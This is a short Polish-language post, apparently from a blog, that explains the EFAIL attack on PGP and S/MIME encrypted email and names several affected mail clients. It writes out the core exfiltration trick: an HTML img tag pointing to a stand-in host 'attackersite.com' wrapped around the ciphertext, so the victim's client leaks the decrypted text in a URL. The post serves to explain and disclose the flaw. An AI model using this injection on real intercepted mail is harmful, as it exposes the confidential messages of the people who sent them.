Jak bezpiecznie przesłać list elektroniczny (email’a), czyli tak, aby zachować jego poufność i integralność? Do wyboru mamy 2 rozwiązania: PGP lub SMIME, oba wspierane w każdym szanującym się kliencie pocztowym. Oba oparte o doskonale poznaną w świecie kryptologów kryptografię asymetryczną i jednocześnie uznawaną za całkowicie bezpieczną.
List zaszyfrowany kluczem publicznym odbiorcy jest nie do odczytania. W ostatnich dniach okazało się, że jednak nie zawsze. Jeśli ktoś jest w stanie przechwycić taki szyfrogram, co może zrobić np. operator sieci lub administrator serwera pocztowego, następnie zmodyfikować nagłówki maila i przesłać do nas, to ma duże szanse na to, żeby poznać zaszyfrowaną przez nas treść.
Wystarczy, że naszym klientem poczty jest np. Thunderbird (Linux), Apple Mail, Airmail (iPhone), Mail Droid (Android), Outlook (Windows) czy po prostu Gmail.
Rysunek i szczegóły w oryginalnej publikacji umieszczonej pod adresem: https://efail.de/efail-attack-paper.pdf. Odkrywcy opisują kilka różnych podatności klientów pocztowych, ale najbardziej niebezpieczna z nich nie ma nic wspólnego z kryptologią i jej działanie jest banalnie proste. Wystarczy, że atakujący wstrzyknie w treść maila przed szyfrogramem tag HTML z obrazkiem, np.
<img src=”https://attackersite.com/ a po szyfrogramie zakończenie taga: .jpg”>. Klient pocztowy ofiary w pierwszej kolejności odszyfruje tekst, a następnie sparsuje tagi HTML, próbująć pobrać z serwera atakującego nieistniejący plik .jpg o nazwie będącej…treścią tajnego tekstu. Dlaczego nikt nie wpadł na to wcześniej? A może jednak wpadł?……